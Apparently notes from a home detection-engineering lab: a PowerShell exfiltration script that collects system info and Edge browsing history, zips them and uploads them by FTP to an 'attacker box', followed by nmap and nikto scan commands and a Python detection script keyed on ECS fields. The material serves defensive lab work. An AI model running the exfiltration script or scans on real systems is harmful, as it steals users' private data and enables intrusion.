Exfil script
Attacker Box
Start-Sleep -Seconds 5
Exfil.ps1
# Stage host information in a temp folder (folder created first so the redirect succeeds)
New-Item -ItemType Directory -Path C:\Windows\Temp\Exfil -Force | Out-Null
systeminfo > C:\Windows\Temp\Exfil\sysinfo.txt
# Copy the current user's Edge browsing history database into the staging folder
$browsing_history_file_path = "C:\Users\" + $Env:UserName + "\AppData\Local\Microsoft\Edge\User Data\Default\History"
cp $browsing_history_file_path C:\Windows\Temp\Exfil
# Bundle the staged files into a single archive
Compress-Archive -LiteralPath C:\Windows\Temp\Exfil -DestinationPath C:\Windows\Temp\Exfil.zip
# Upload the archive to the FTP server on the attacker box (PowerShell strings take single backslashes)
$client = New-Object System.Net.WebClient
$client.Credentials = New-Object System.Net.NetworkCredential("parrot", "parrot")
$client.UploadFile("ftp://192.168.80.8/Exfil.zip", "C:\Windows\Temp\Exfil.zip")
3 ATTACK Scenarios
Test: sudo nmap -sV -p 8000 192.168.80.4 ← Elastic discovered this activity
sudo nikto -h 192.168.80.4
Port scanning a web server built with Python.
Extra: Spin up a SQL database server, an FTP server, an SMTP mail server, or even an AD server, run scans against those disparate servers, and create detections from the resulting logs.
user_agent.original
url.path
source.ip
event.action
destination.ip
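As an added example (not part of the lab material), the Python below shows how the ECS fields listed above can drive a detection for the nikto and nmap activity against the web server on 192.168.80.4:8000: one rule keys on a scanner name in user_agent.original, the other on a single source.ip requesting many distinct url.path values. The events, the user-agent marker strings and the threshold are constructed assumptions for this example.

```python
from collections import defaultdict

# Hypothetical ECS-style events shaped like the fields the lab lists; the values
# are constructed for this example, not captured from the lab network.
def ev(src, path, ua, action="http_request", dst="192.168.80.4"):
    return {"source": {"ip": src}, "destination": {"ip": dst, "port": 8000},
            "event": {"action": action}, "url": {"path": path},
            "user_agent": {"original": ua}}

NIKTO_UA = "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edg/120.0"
SAMPLE_EVENTS = [ev("192.168.80.8", p, NIKTO_UA) for p in
                 ("/", "/admin/", "/cgi-bin/", "/backup/", "/.git/HEAD", "/server-status")]
SAMPLE_EVENTS += [ev("192.168.80.20", "/", BROWSER_UA),
                  ev("192.168.80.20", "/index.html", BROWSER_UA)]

# Assumed substrings that identify the scanners used in the lab when they announce themselves.
SCANNER_UA_MARKERS = ("nikto", "nmap")

def detect_scanning(events, web_server_ip="192.168.80.4", path_threshold=5):
    """Return alerts for scanner user agents and for sources enumerating many paths."""
    alerts, flagged_ua = [], set()
    paths_by_source = defaultdict(set)
    for e in events:
        if e["destination"]["ip"] != web_server_ip:   # only traffic to the lab web server
            continue
        src = e["source"]["ip"]
        ua = e["user_agent"]["original"]
        # Rule 1: a known scanner names itself in user_agent.original (one alert per source)
        if src not in flagged_ua and any(m in ua.lower() for m in SCANNER_UA_MARKERS):
            flagged_ua.add(src)
            alerts.append({"rule": "scanner_user_agent", "source.ip": src,
                           "event.action": e["event"]["action"], "user_agent.original": ua})
        paths_by_source[src].add(e["url"]["path"])
    # Rule 2: one source requesting many distinct url.path values looks like enumeration;
    # this also catches tools that do not identify themselves in the user agent
    for src, paths in paths_by_source.items():
        if len(paths) >= path_threshold:
            alerts.append({"rule": "path_enumeration", "source.ip": src,
                           "distinct_paths": len(paths)})
    return alerts

if __name__ == "__main__":
    for alert in detect_scanning(SAMPLE_EVENTS):
        print(alert)
```

Running it against the constructed events yields two alerts, both for 192.168.80.8, while the browsing client with two paths stays quiet.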